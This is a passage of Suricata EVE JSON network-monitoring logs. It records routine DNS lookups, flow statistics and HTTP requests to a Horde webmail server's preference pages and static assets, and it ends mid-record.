{"timestamp":"2020-02-29T00:25:15.000420+0000","flow_id":2114307948884849,"event_type":"flow","src_ip":"192.168.10.122","src_port":38148,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:13.602993+0000","end":"2020-02-29T00:20:13.714116+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:17.000335+0000","event_type":"stats","stats":{"uptime":15169,"capture":{"kernel_packets":141313,"kernel_drops":0},"decoder":{"pkts":141412,"bytes":97133781,"invalid":195,"ipv4":139825,"ipv6":10,"ethernet":141412,"raw":0,"null":0,"sll":0,"tcp":134257,"udp":5358,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091008},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2903,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2919,"synack":2910,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1911,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2450,"failed_udp":116},"tx":{"http":4963,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2534}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2532,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35665,"memcap":0}}} {"timestamp":"2020-02-29T00:25:17.000998+0000","flow_id":80645229386881,"event_type":"flow","src_ip":"192.168.10.122","src_port":55639,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:16.662657+0000","end":"2020-02-29T00:20:16.774063+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:17.887686+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53132,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":1}} {"timestamp":"2020-02-29T00:25:19.023428+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50951,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:19.131426+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50951,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:19.131426+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50951,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:19.213257+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3425}} {"timestamp":"2020-02-29T00:25:21.496587+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3425},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} {"timestamp":"2020-02-29T00:25:21.508513+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46389,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64085,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:21.616770+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46389,"proto":"UDP","dns":{"type":"answer","id":64085,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:21.616770+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46389,"proto":"UDP","dns":{"type":"answer","id":64085,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:21.742083+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799}} {"timestamp":"2020-02-29T00:25:21.795448+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:25:21.799324+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:25:21.802311+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:25:21.802660+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:25:21.834936+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":3}} {"timestamp":"2020-02-29T00:25:21.835707+0000","flow_id":1482449560383490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53138,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:25:21.833550+0000","flow_id":1291220436495971,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53136,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:25:21.877288+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:25:21.887524+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":4}} {"timestamp":"2020-02-29T00:25:21.888085+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:25:22.002635+0000","flow_id":412190935165934,"event_type":"flow","src_ip":"192.168.10.122","src_port":60597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:21.601070+0000","end":"2020-02-29T00:20:21.712317+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:24.000418+0000","event_type":"stats","stats":{"uptime":15176,"capture":{"kernel_packets":141522,"kernel_drops":0},"decoder":{"pkts":141561,"bytes":97241089,"invalid":195,"ipv4":139974,"ipv6":10,"ethernet":141561,"raw":0,"null":0,"sll":0,"tcp":134402,"udp":5362,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2906,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2922,"synack":2913,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1914,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2452,"failed_udp":116},"tx":{"http":4971,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2536}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2534,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":105136,"memcap":0}}} {"timestamp":"2020-02-29T00:25:24.162555+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56920,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:24.190806+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":5}} {"timestamp":"2020-02-29T00:25:24.271143+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34990,"proto":"UDP","dns":{"type":"answer","id":56920,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:24.271143+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34990,"proto":"UDP","dns":{"type":"answer","id":56920,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:24.383397+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5316}} {"timestamp":"2020-02-29T00:25:24.444426+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5316},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":6}} {"timestamp":"2020-02-29T00:25:24.446802+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:25:26.838842+0000","flow_id":1291220436495971,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53136,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":0}} {"timestamp":"2020-02-29T00:25:26.839002+0000","flow_id":1482449560383490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53138,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:29.451829+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":7}} {"timestamp":"2020-02-29T00:25:31.000257+0000","event_type":"stats","stats":{"uptime":15183,"capture":{"kernel_packets":141589,"kernel_drops":0},"decoder":{"pkts":141593,"bytes":97251200,"invalid":195,"ipv4":140006,"ipv6":10,"ethernet":141593,"raw":0,"null":0,"sll":0,"tcp":134432,"udp":5364,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2906,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2922,"synack":2913,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1914,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2453,"failed_udp":116},"tx":{"http":4973,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2537}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2534,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":11227,"memcap_state":0,"memcap_global":0},"http":{"memuse":1280,"memcap":0}}} {"timestamp":"2020-02-29T00:25:32.000516+0000","flow_id":210589465948869,"event_type":"flow","src_ip":"192.168.10.122","src_port":35430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:31.635589+0000","end":"2020-02-29T00:20:31.746740+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:32.001504+0000","flow_id":2045171861543121,"event_type":"flow","src_ip":"192.168.10.122","src_port":49402,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:31.841937+0000","end":"2020-02-29T00:20:31.950688+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:33.660270+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14725,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:33.768730+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":14725,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:33.768730+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":14725,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:33.933068+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:25:33.951123+0000","flow_id":407294692922328,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5413}} {"timestamp":"2020-02-29T00:25:34.000675+0000","flow_id":1239998652620537,"event_type":"flow","src_ip":"192.168.10.130","src_port":34284,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":30,"pkts_toclient":63,"bytes_toserver":3393,"bytes_toclient":80771,"start":"2020-02-29T00:24:22.597753+0000","end":"2020-02-29T00:24:27.642179+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:25:38.000187+0000","event_type":"stats","stats":{"uptime":15190,"capture":{"kernel_packets":141593,"kernel_drops":0},"decoder":{"pkts":141609,"bytes":97258964,"invalid":195,"ipv4":140022,"ipv6":10,"ethernet":141609,"raw":0,"null":0,"sll":0,"tcp":134446,"udp":5366,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2907,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2923,"synack":2914,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"